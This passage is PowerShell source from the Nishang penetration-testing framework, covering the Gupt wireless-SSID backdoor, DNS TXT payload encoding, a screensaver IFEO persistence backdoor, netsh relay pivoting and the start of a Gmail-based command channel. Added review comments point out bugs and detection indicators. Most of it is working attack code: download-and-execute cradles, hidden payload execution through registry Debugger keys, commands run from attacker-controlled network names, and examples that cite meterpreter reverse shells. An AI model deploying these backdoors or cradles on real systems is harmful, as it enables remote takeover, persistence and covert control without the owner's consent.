5678PS > Gupt-Backdoor -MagicString op3n -Verbose
5679In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
5680
5681PS > Gupt-Backdoor -MagicString op3n -Verbose
5682In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be
5683"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
5684by the Google shortener would be downloaded and executed.
5685
5686.LINK
5687http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
5688https://github.com/samratashok/nishang
5689#>
5690 [CmdletBinding()] Param(
5691
5692 [Parameter(Position=0, Mandatory = $True)]
5693 [String]
5694 $MagicString,
5695
5696 [Parameter(Position=3, Mandatory = $False)]
5697 [String]
5698 $Arguments
5699
5700 )
5701 #Get list of available Wlan networks
 # Polling loop: every pass spawns netsh.exe ("netsh wlan show network") through
 # Invoke-Expression and then sleeps 5 s, so a running instance produces a steady stream
 # of netsh process-creation events for as long as it lives.
5702 while($True)
5703 {
5704 Write-Verbose "Checking wireless networks for instructions."
5705 $networks = Invoke-Expression "netsh wlan show network"
5706 $ssid = $networks | Select-String "SSID"
 # The SSID list is whatever is in radio range; nothing below authenticates it, and both
 # branches hand SSID-derived text straight to Invoke-Expression.
5707 $NetworkNames = $ssid -replace ".*:" -replace " "
5708 ForEach ($network in $NetworkNames)
5709 {
5710 #Check if the first four characters of our SSID matches the given MagicString
 # -match is a regular-expression test, so the first four characters of -MagicString act
 # as an unanchored pattern rather than a literal prefix. Substring(0,4) raises an error
 # for any SSID shorter than four characters.
5711 if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
5712 {
5713 Write-Verbose "Found a network with instructions!"
5714 #If the network SSID contains fifth character "u", it means rest of the SSID is a URL
5715 if ($network.Substring(4)[0] -eq "u")
5716 {
5717 Write-Verbose "Downloading the attack script and executing it in memory."
 # NOTE(review): Google has deprecated the goo.gl shortener, so this branch presumably
 # no longer resolves for most ids — confirm before relying on it.
5718 $PayloadURL = "http://goo.gl/" + $network.Substring(5)
5719 $webclient = New-Object System.Net.WebClient
5720 Invoke-Expression $webclient.DownloadString($PayloadURL)
5721 if ($Arguments)
5722 {
5723 Invoke-Expression $Arguments
5724 }
5725 Start-Sleep -Seconds 10
5726 }
5727 elseif ($network.Substring(4)[0] -eq "c")
5728 {
5729 $cmd = $network.Substring(5)
5730 if ($cmd -eq "exit")
5731 {
 # break leaves only the inner ForEach; the outer while($True) resumes polling after
 # the 5 s sleep, so "exit" does not stop the function.
5732 break
5733 }
5734 Write-Verbose "Command `"$cmd`" found. Executing it."
5735 Invoke-Expression $cmd
5736 Start-Sleep -Seconds 10
5737 }
5738 }
5739 }
5740 Start-Sleep -Seconds 5
5741 }
5742}
5743
5744###################################Function for generating encoded DNS TXT Records###########################
5745function Out-DnsTxt
5746{
5747<#
5748.SYNOPSIS
5749Script for Nishang to generate DNS TXT records which could be used with other scripts.
5750
5751.DESCRIPTION
5752Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code.
5753The script asks for a path to a plain file or string, compresses and encodes it and writes to a file "encodedtxt.txt" in the current working directory.
5754Each line in the generated file is a DNS TXT record to be saved in separate subdomain.
5755The length of DNS TXT records is assumed to be 255 characters by the script.
5756
5757.PARAMETER DataToEncode
5758The path of the file to be encoded. Use with -IsString to enter a string.
5759
5760.PARAMETER OutputFilePath
5761The path of the output file. Default is "encodedtxt.txt" in the current working directory.
5762
5763.PARAMETER LengthOfTXT
5764The length of the TXT records. Default is 255.
5765
5766.PARAMETER IsString
5767Use this to specify the command to be encoded if you are passing a string in place of a filepath.
5768
5769.EXAMPLE
5770PS > OUT-DNSTXT -DataToEncode C:\nishang\Gather\Get-Information.ps1
5771Use above command to generate encoded DNS TXT records. Each record must be put in a separate subdomain.
5772
5773.EXAMPLE
5774PS > OUT-DNSTXT "Get-Service" -IsString
5775Use above to generate TXT records for a command.
5776
5777
5778.EXAMPLE
5779PS > OUT-DNSTXT -DataToEncode C:\shellcode\shellcode.txt
5780Use above command to generate encoded DNS TXT records for a shellcode. Each record must be put in a separate subdomain.
5781
5782.LINK
5783http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
5784https://github.com/samratashok/nishang
5785
5786#>
5787 [CmdletBinding()] Param(
5788 [Parameter(Position = 0, Mandatory = $True)]
5789 [String]
5790 $DataToEncode,
5791
5792 [Parameter(Position = 1, Mandatory = $False)]
5793 [String]
5794 $OutputFilePath = "$pwd\encodedtxt.txt",
5795
5796 [Parameter(Mandatory = $False)]
5797 [String]
5798 $LengthOfTXT = 255,
5799
5800 [Switch]
5801 $IsString
5802 )
 # -IsString: encode the argument itself; otherwise read the file as ASCII text lines
 # (binary input is not handled).
5803 if($IsString -eq $true)
5804 {
5805
5806 $Enc = $DataToEncode
5807
5808 }
5809 else
5810 {
5811 $Enc = Get-Content $DataToEncode -Encoding Ascii
5812 }
5813
5814 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
 # Deflate the input line by line (each line gets a trailing newline from WriteLine), then
 # base64 the raw stream. There is no header or checksum; the consumer must apply the exact
 # inverse (base64 -> inflate).
5815 $ms = New-Object IO.MemoryStream
5816 $action = [IO.Compression.CompressionMode]::Compress
5817 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
5818 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
5819 $Enc | ForEach-Object {$sw.WriteLine($_)}
5820 $sw.Close()
5821 # Base64 encode stream
5822 $Compressed = [Convert]::ToBase64String($ms.ToArray())
 # $LengthOfTXT is declared [String]; PowerShell coerces it for the arithmetic below, so a
 # non-numeric value fails here rather than at parameter binding.
5823 $index = [math]::floor($Compressed.Length/$LengthOfTXT)
5824 $i = 0
 # Creates (or truncates) the output file before any record is appended.
5825 Out-File -InputObject $null -FilePath $OutputFilePath
5826 #Split encoded input in strings of 255 characters if its length is more than 255.
5827 if ($Compressed.Length -gt $LengthOfTXT)
5828 {
 # Each full-length chunk is followed by three newlines as a record separator.
5829 while ($i -lt $index )
5830 {
5831 $TXTRecord = $Compressed.Substring($i*$LengthOfTXT,$LengthOfTXT)
5832 $i +=1
5833 Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
5834 Out-File -InputObject "`n`n`n" -FilePath $OutputFilePath -Append
5835 }
 # $TotalRecords is assigned only inside this branch. When the encoded length is an exact
 # multiple of $LengthOfTXT, the count message below prints empty and $TXTRecord still
 # holds the loop's last chunk, which is then appended a second time.
5836 $remainingindex = $Compressed.Length%$LengthOfTXT
5837 if ($remainingindex -ne 0)
5838 {
5839 $TXTRecord = $Compressed.Substring($index*$LengthOfTXT, $remainingindex)
5840 $TotalRecords = $index + 1
5841 }
5842 #Write to file
5843 Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
5844 Write-Output "You need to create $TotalRecords TXT records."
5845 Write-Output "All TXT Records written to $OutputFilePath"
5846 }
5847 #If the input has small length, it could be used in a single subdomain.
5848 else
5849 {
5850 Write-Output "TXT Record could fit in single subdomain."
5851 Write-Output $Compressed
5852 Out-File -InputObject $Compressed -FilePath $OutputFilePath -Append
5853 Write-Output "TXT Records written to $OutputFilePath"
5854 }
5855
5856
5857}
5858
5859##########################################Function for adding screensaver backdoor###########################################
5860function Add-ScrnSaveBackdoor
5861{
5862<#
5863.SYNOPSIS
5864Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts.
5865
5866.DESCRIPTION
5867The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
5868to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.
5869A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.
5870It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload.
5871
5872When the payload is executed, the screensaver also runs after it to make it appear legit. Change the contents of the payload URL
5873to execute different scripts using the same backdoor.
5874
5875.PARAMETER Payload
5876Payload which you want execute on the target.
5877
5878.PARAMETER PayloadURL
5879URL of the powershell script which would be executed on the target.
5880
5881.PARAMETER Arguments
5882Arguments to the powershell script to be executed on the target.
5883
5884.PARAMETER NewScreenSaver
5885Full path to the screensaver to be used if none is being used. Default is C:\Windows\System32\Ribbons.scr
5886
5887.EXAMPLE
5888PS > Add-ScrnSaveBackdoor -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
5889
5890Use above command to provide your own payload to be executed.
5891
5892
5893.EXAMPLE
5894PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
5895
5896Use above to execute FireBuster from Nishang for Egress Testing.
5897
5898.EXAMPLE
5899PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
5900
5901Use above to execute HTTP-Backdoor from Powerpreter
5902
5903.EXAMPLE
5904PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
5905
5906Use above to execute an in-memory meterpreter in PowerShell format generated using msfvenom
5907(./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell)
5908
5909
5910.LINK
5911http://www.labofapenetrationtester.com/2015/02/using-windows-screensaver-as-backdoor.html
5912https://github.com/samratashok/nishang
5913#>
5914
5915 [CmdletBinding()] Param(
5916 [Parameter(Position = 0, Mandatory = $False)]
5917 [String]
5918 $Payload,
5919
5920 [Parameter(Position = 1, Mandatory = $False)]
5921 [String]
5922 $PayloadURL,
5923
5924 [Parameter(Position = 2, Mandatory = $False)]
5925 [String]
5926 $Arguments,
5927
5928 [Parameter(Position = 3, Mandatory = $False)]
5929 [String]
5930 $NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
5931 )
5932
5933 #Check if ScreenSaver is enabled
5934 #If no enable it, if yes, get its value
 # Per-user state is changed first: SCRNSAVE.EXE (when unset) and ScreenSaveTimeOut below
 # are written under HKCU before the HKLM write further down, so on a non-elevated run
 # these changes land even if the Debugger value cannot be created. New-ItemProperty also
 # emits the created property to the pipeline.
5935 if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -eq $null)
5936 {
5937 New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
5938 $ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
5939 }
5940 else
5941 {
5942 $ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
5943 }
5944
5945 #Set ScreenSaveTimeOut which is necessary to enable screensaver.
 # Unconditionally forces a 60-second timeout, overwriting whatever the user had configured.
5946 if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("ScreenSaveTimeOut") -eq $null)
5947 {
5948 New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
5949 }
5950 else
5951 {
5952 Set-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60
5953 }
5954
5955 #Get a list of default screensavers and select one at random
 # $PathToScreensaver is a FileInfo object; its string form is concatenated below
 # (presumably the full path under Windows PowerShell — verify on the target version).
5956 $ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
5957 $PathToScreensaver = Get-Random $ListScrn
5958
5959 #Add a default screensaver to payload so that it runs after our payload.
 # Both branches end with "<screensaver> /s" so a genuine screensaver still runs after the
 # payload. The elseif is equivalent to a plain else: $Payload is either empty or not.
5960 if(!$Payload)
5961 {
5962 $RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
5963 }
5964 elseif ($Payload)
5965 {
5966 $RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
5967 }
5968 #Set Debugger for the ScreenSaver executable
 # Image File Execution Options\<scr>\Debugger makes Windows launch $RegValue in place of
 # that screensaver binary. Writing under HKLM normally requires elevation; an IFEO Debugger
 # value that points at powershell.exe is a well-known persistence indicator and a cheap
 # thing to monitor. New-Item below also prints the created key to the pipeline.
5969 if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
5970 {
5971
5972 Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
5973 Write-Output "Payload added as Debugger for $ScreenSaverName"
5974 }
5975 else
5976 {
5977 New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
5978 Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
5979 Write-Output "Payload added as Debugger for $ScreenSaverName"
5980 }
5981}
5982
5983
5984############################################# Add network relays##########################################
5985function Invoke-NetworkRelay
5986{
5987<#
5988.SYNOPSIS
5989Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers.
5990
5991.DESCRIPTION
5992This script is a wrapper around the netsh Windows command's portproxy functionality. It could be used to create and remove
5993network relays between computers. The script is useful in scenarios when you want to access a port or service running on a
5994target computer which is accessible only through another computer(s) between you and the target computer. Another interesting
5995usecase is when you want to expose a local service to the network.
5996
5997.PARAMETER Relay
5998Specify the type of relay from "v4tov4","v6tov4","v4tov6" and "v6tov6". Default is v4tov4.
5999v4tov4 - Listen on v4 and connect to v4.
6000
6001
6002.PARAMETER ListenAddress
6003The local/listener IP address to which a remote port will be forwarded. Default is 0.0.0.0 (IPv4)
6004
6005.PARAMETER ListenPort
6006The local/listener port to which a remote port will be forwarded. Default is 8888.
6007
6008.PARAMETER ConnectAddress
6009The target/destination IP address whose port will be forwarded/mapped to a local port.
6010
6011.PARAMETER ConnectPort
6012The target/destination port which will be forwarded/mapped to a local port.
6013
6014.PARAMETER ComputerName
6015The name or IP address of the computer where the netsh command would be executed.
6016
6017.PARAMETER UserName
6018Username for the computer specified with the ComputerName parameter.
6019
6020.PARAMETER Password
6021Password for the computer specified with the ComputerName parameter.
6022
6023.PARAMETER Delete
6024Use the Delete switch to delete a network relay specified by above options.
6025
6026.PARAMETER Show
6027Use the Show switch to show all relays on a computer.
6028
6029.EXAMPLE
6030PS > Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141
6031Add a network relay which listens on IPv4 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
6032
6033.EXAMPLE
6034PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141
6035Add a network relay which listens on IPv6 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
6036
6037.EXAMPLE
6038PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
6039Add a network relay which listens on IPv6 and connects to IPv6 and forwards port 445 from fe80::19ed:c169:128c:b68d to port 8888 of domainpc
6040
6041.EXAMPLE
6042PS > Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141 -Delete
6043Delete the network relay specified by the ListenAddress and Listen Port.
6044
6045.EXAMPLE
6046PS > Invoke-NetworkRelay -ComputerName domainpc -Username bharat\domainuser -Password Password1234 -Show
6047Show all network relays on the domainpc computer
6048
6049
6050.LINK
6051http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
6052https://github.com/samratashok/nishang
6053#>
6054
6055 [CmdletBinding(DefaultParameterSetName="AddOrDelete")] Param(
6056
6057 [Parameter(Position = 0, Mandatory = $False, ParameterSetName="AddOrDelete")]
6058 [ValidateSet("v4tov4","v6tov4","v4tov6","v6tov6")]
6059 [String]
6060 $Relay="v4tov4",
6061
6062 [Parameter(Position = 1, Mandatory = $False, ParameterSetName="AddOrDelete")]
6063 [String]
6064 $ListenAddress = "0.0.0.0",
6065
6066 [Parameter(Position = 2, Mandatory= $False, ParameterSetName="AddOrDelete")]
6067 [String]
6068 $ListenPort = 8888,
6069
6070 [Parameter(Position = 3, Mandatory = $True, ParameterSetName="AddOrDelete")]
6071 [String]
6072 $ConnectAddress,
6073
6074 [Parameter(Position = 4, Mandatory = $True, ParameterSetName="AddOrDelete")]
6075 [String]
6076 $ConnectPort,
6077
6078 [Parameter(Position = 5, Mandatory = $False, ParameterSetName="AddOrDelete")]
6079 [Parameter(Position = 0, Mandatory = $False, ParameterSetName="Show")]
6080 [String]
6081 $ComputerName,
6082
6083 [Parameter(Position = 6, Mandatory = $False, ParameterSetName="AddOrDelete")]
6084 [Parameter(Position = 1, Mandatory = $False, ParameterSetName="Show")]
6085 $UserName,
6086
6087 [Parameter(Position = 7, Mandatory = $False, ParameterSetName="AddOrDelete")]
6088 [Parameter(Position = 2, Mandatory = $False, ParameterSetName="Show")]
6089 $Password,
6090
6091 [Parameter(Mandatory = $False, ParameterSetName="AddOrDelete")]
6092 [Switch]
6093 $Delete,
6094
6095 [Parameter(Mandatory = $False, ParameterSetName="Show")]
6096 [Switch]
6097 $Show
6098
6099 )
6100
6101
6102 #Check if Username and Password are provided
 # -Password arrives as plain text and is only then wrapped in a SecureString, so it is
 # exposed in command history, transcripts and the process command line; accepting a
 # [PSCredential] (Get-Credential) would avoid that. $Creds is $False when no credential
 # is supplied so the branches below can test it directly.
6103 if ($UserName -and $Password)
6104 {
6105 $SecurePassword = ConvertTo-SecureString $Password -AsPlainText -Force
6106 $Creds = New-Object System.Management.Automation.PSCredential ($UserName, $SecurePassword)
6107 }
6108 else
6109 {
6110 $Creds = $False
6111 }
6112
 # -Show: list every portproxy entry on the remote host and fall through; the two
 # blocks below are skipped because $Show is set.
6113 if ($Show)
6114 {
6115 if ($Creds)
6116 {
6117 Invoke-Command -ScriptBlock {netsh interface portproxy show all} -ComputerName $ComputerName -Credential $Creds
6118 }
6119 else
6120 {
6121 Invoke-Command -ScriptBlock {netsh interface portproxy show all} -ComputerName $ComputerName
6122 }
6123 }
6124
6125 if (!$Delete -and !$Show)
6126 {
6127 #Prepare relay commands
 # The names below differ only in case from the ones read in the switch ($V4tov4Relay vs
 # $V4toV4Relay); PowerShell variable names are case-insensitive so they resolve to the
 # same value. Parameter values are interpolated into the netsh command line unvalidated.
6128 $V4tov4Relay = "netsh interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
6129 $V6toV4Relay = "netsh interface portproxy add v6tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
6130 $V4tov6Relay = "netsh interface portproxy add v4tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
6131 $V6toV6Relay = "netsh interface portproxy add v6tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
6132
6133 #Create a scriptblock depending upon the type of relay.
6134 switch ($Relay)
6135 {
6136 "v4tov4"
6137 {
6138 $sb = [ScriptBlock]::Create($V4toV4Relay)
6139 Write-Output "Initiating v4tov4 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6140 }
6141 "v6tov4"
6142 {
6143 $sb = [ScriptBlock]::Create($V6toV4Relay)
6144 Write-Output "Initiating v6tov4 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6145 }
6146 "v4tov6"
6147 {
6148 $sb = [ScriptBlock]::Create($V4toV6Relay)
6149 Write-Output "Initiating v4tov6 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6150 }
6151 "v6tov6"
6152 {
6153 $sb = [ScriptBlock]::Create($V6toV6Relay)
6154 Write-Output "Initiating v6tov6 Relay. Listening on $ListenAddress, Port $ListenPort. Connecting to $Connectaddress, Port $Connectport"
6155 }
6156 }
6157
6158 #Execute the netsh command on remote computer
 # Only the credential branch passes $Relay into the remote scriptblock via -ArgumentList.
 # The else branch's scriptblock references the local $Relay, which does not exist in the
 # remote session, so that "show" call presumably runs with an empty relay type. The
 # delete section below has the same asymmetry.
6159 if ($Creds)
6160 {
6161 Invoke-Command -ScriptBlock $sb -ComputerName $ComputerName -Credential $Creds
6162 Invoke-Command -ScriptBlock {param ($SBRelay) netsh interface portproxy show $SBRelay } -ArgumentList $Relay -ComputerName $ComputerName -Credential $Creds
6163 }
6164 else
6165 {
6166 Invoke-Command -ScriptBlock $sb -ComputerName $ComputerName
6167 Invoke-Command -ScriptBlock {netsh interface portproxy show $Relay } -ComputerName $ComputerName
6168 }
6169 }
 # -Delete: the relay is identified by listen port/address only; ConnectAddress and
 # ConnectPort remain mandatory in this parameter set but are used solely in the message.
6170 if ($Delete)
6171 {
6172 #Relay commands for deletion
6173 $V4tov4Relay = "netsh interface portproxy delete v4tov4 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
6174 $V6toV4Relay = "netsh interface portproxy delete v6tov4 listenport=$ListenPort listenaddress=$ListenAddress"
6175 $V4tov6Relay = "netsh interface portproxy delete v4tov6 listenport=$ListenPort listenaddress=$ListenAddress"
6176 $V6toV6Relay = "netsh interface portproxy delete v6tov6 listenport=$ListenPort listenaddress=$ListenAddress protocol=tcp"
6177
6178 #Create a scriptblock for deleting the relay, depending upon its type.
6179 switch ($Relay)
6180 {
6181 "v4tov4"
6182 {
6183 $sbdelete = [ScriptBlock]::Create($V4toV4Relay)
6184 Write-Output "Deleting v4tov4 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6185 }
6186 "v6tov4"
6187 {
6188 $sbdelete = [ScriptBlock]::Create($V6toV4Relay)
6189 Write-Output "Deleting v6tov4 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6190 }
6191 "v4tov6"
6192 {
6193 $sbdelete = [ScriptBlock]::Create($V4toV6Relay)
6194 Write-Output "Deleting v4tov6 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6195 }
6196 "v6tov6"
6197 {
6198 $sbdelete = [ScriptBlock]::Create($V6toV6Relay)
6199 Write-Output "Deleting v6tov6 Relay which was listening on $ListenAddress, Port $ListenPort and connecting to $Connectaddress, Port $Connectport"
6200 }
6201 }
6202
6203 #Execute the netsh command on remote computer
6204 if ($Creds)
6205 {
6206 Invoke-Command -ScriptBlock $sbdelete -ComputerName $ComputerName -Credential $Creds
6207 Invoke-Command -ScriptBlock {param ($SBRelay) netsh interface portproxy show $SBRelay } -ArgumentList $Relay -ComputerName $ComputerName -Credential $Creds
6208 }
6209 else
6210 {
6211 Invoke-Command -ScriptBlock $sbdelete -ComputerName $ComputerName
6212 Invoke-Command -ScriptBlock {netsh interface portproxy show $Relay } -ComputerName $ComputerName
6213 }
6214 }
6215}
6216
6217
6218########################################## Gcat - Using Gmail for code execution ######################################
6219
6220########################################## Invoke-PSGcat needs to be run on attacker's machine ########################
6221function Invoke-PSGcat
6222{
6223<#
6224.SYNOPSIS
6225Nishang script which can be used to send commands and scripts to Gmail which can then be run on a target using Invoke-PSGcatAgent.
6226
6227.DESCRIPTION
6228This script is capable of sending commands and/or scripts to Gmail. A valid Gmail username and password is required.
6229The command is compressed and base64 encoded and sent to the Gmail account. On the target, Invoke-PsGcatAgent must be executed
6230which will read the last sent command/script, decode it, execute it and send the output back to Gmail.
6231In the Gmail security settings of that account "Access for less secure apps" must be turned on. Make sure that you use
6232a throw away account.
6233
6234In the interactive mode, to execute a script, type "script" at the PsGcat prompt and provide full path to the script.
6235To read output, type "GetOutput" at the PsGcat prompt.
6236
6237Currently, the output is not pretty at all and you will see the script interacting with Gmail IMAP.
6238
6239.PARAMETER Username
6240Username of the Gmail account you want to use.
6241
6242.PARAMETER Password
6243Password of the Gmail account you want to use.
6244
6245.PARAMETER AgentID
6246AgentID is currently unused and would be used with multiple agent support in future.
6247
6248.PARAMETER Payload
6249In Non-interactive mode, the PowerShell command you want to send to the Gmail account.
6250
6251.PARAMETER ScriptPath
6252In Non-interactive mode, the PowerShell script you want to send to the Gmail account.
6253
6254.PARAMETER NonInteractive
6255Use the non-interactive mode. Execute the provided command or payload and exit.
6256
6257.PARAMETER GetOutput
6258Retrieve last ouput from Gmail.
6259
6260.EXAMPLE
6261PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6262Use GetOutput to get output.
6263Use Script to specify a script.
6264PsGcat: Get-Process
6265Command sent to psgcatlite@gmail.com
6266
6267
6268Above shows an example where Get-Process is sent to Gmail.
6269
6270.EXAMPLE
6271PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6272Use GetOutput to get output.
6273Use Script to specify a script.
6274PsGcat: GetOutput
6275-----Lot of IMAP text-----
6276* 8 FETCH (BODY[TEXT] {5206}
6277System.Diagnostics.Process (BTHSAmpPalService) System.Diagnostics
6278.Process (BTHSSecurityMgr) System.Diagnostics.Process (btplayerct
6279rl) System.Diagnostics.Process (capiws) System.Diagnostics.Proces
6280s (conhost) System.Diagnostics.Process (conhost) System.Diagnosti
6281
6282
6283Above shows how to retrieve output from Gmail. Note that the output is ugly and you may need to run GetOutput few times
6284before the complete output is read. Also, the Invoke-PsGcatAgent must execute the command before an output could be retrieved.
6285
6286
6287.EXAMPLE
6288PS > Invoke-PSGcat -Username psgcatlite -password pspassword
6289Use GetOutput to get output.
6290Use Script to specify a script.
6291PsGcat: script
6292Provide complete path to the PowerShell script.: C:\test\reverse_powershell.ps1
6293Command sent to psgcatlite@gmail.com
6294Use GetOutput to get output.
6295
6296
6297Use above to send a PowerShell script to the Gmail account. Script execution is not very reliable right now and you may see
6298the agent struggling to pull a big encoded script. Also, make sure that the function call for script is done from the
6299script itself.
6300
6301.EXAMPLE
6302PS > Invoke-PSGcat -Username psgcatlite -password pspassword -Payload Get-Service -NonInteractive
6303Send a command to the Gmail account without any interaction.
6304
6305.EXAMPLE
6306PS > Invoke-PSGcat -Username psgcatlite -password pspassword -ScriptPath C:\test\reverse_powershell.ps1 -NonInteractive
6307Send a script to the Gmail account without any interaction.
6308
6309.EXAMPLE
6310PS > Invoke-PSGcat -Username psgcatlite -password pspassword -GetOutput
6311Get output from the gmail account.
6312
6313.LINK
6314http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
6315https://github.com/samratashok/nishang
6316#>
6317 [CmdletBinding(DefaultParameterSetName="Interactive")] Param(
6318
6319 [Parameter(Position = 0, Mandatory = $false, ParameterSetName="Interactive")]
6320 [Parameter(Position = 0, Mandatory = $false, ParameterSetName="NonInteractive")]
6321 [String]
6322 $Username,
6323
6324 [Parameter(Position = 1, Mandatory = $false, ParameterSetName="Interactive")]
6325 [Parameter(Position = 1, Mandatory = $false, ParameterSetName="NonInteractive")]
6326 [String]
6327 $Password,
6328
6329 [Parameter(Position = 2, Mandatory = $false, ParameterSetName="Interactive")]
6330 [Parameter(Position = 2, Mandatory = $false, ParameterSetName="NonInteractive")]
6331 [String]
6332 $AgentID,
6333
6334 [Parameter(Position = 3, Mandatory = $false, ParameterSetName="NonInteractive")]
6335 [String]
6336 $Payload,
6337
6338 [Parameter(Position = 4, Mandatory = $false, ParameterSetName="NonInteractive")]
6339 [String]
6340 $ScriptPath,
6341
6342 [Parameter(Mandatory = $false, ParameterSetName="NonInteractive")]
6343 [Switch]
6344 $NonInteractive,
6345
6346 [Parameter(Mandatory = $false)]
6347 [Switch]
6348 $GetOutput
6349
6350 )
6351 #$ErrorActionPreference = "SilentlyContinue"
6352
function SendCommand ($Payload, $Username, $Password)
{
    # Nested helper of Invoke-PsGcat (the parameters shadow the outer ones).
    # Deflate-compresses and Base64-encodes $Payload, then mails it from the
    # account to itself with the fixed subject "Command" and a body of
    # "##" + <base64>. Nothing is returned; a confirmation line is written to
    # the output stream. Any failure is reported via Write-Warning/Write-Error.
    #
    # Observable artifacts: SMTP session to smtp.gmail.com with EnableSsl,
    # constant subject "Command", body prefixed by "##".

    try
    {
        # Compression pipeline: MemoryStream <- DeflateStream <- StreamWriter.
        # Each element of $Payload becomes one line; the writer uses the ASCII
        # encoder, so non-ASCII characters in the payload are not preserved.
        $ms = New-Object IO.MemoryStream
        $action = [IO.Compression.CompressionMode]::Compress
        $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
        $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
        $Payload | ForEach-Object {$sw.WriteLine($_)}
        # Closing the writer flushes and finalises the deflate stream.
        $sw.Close()

        # Base64 encode stream
        $Compressed = [Convert]::ToBase64String($ms.ToArray())

        #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
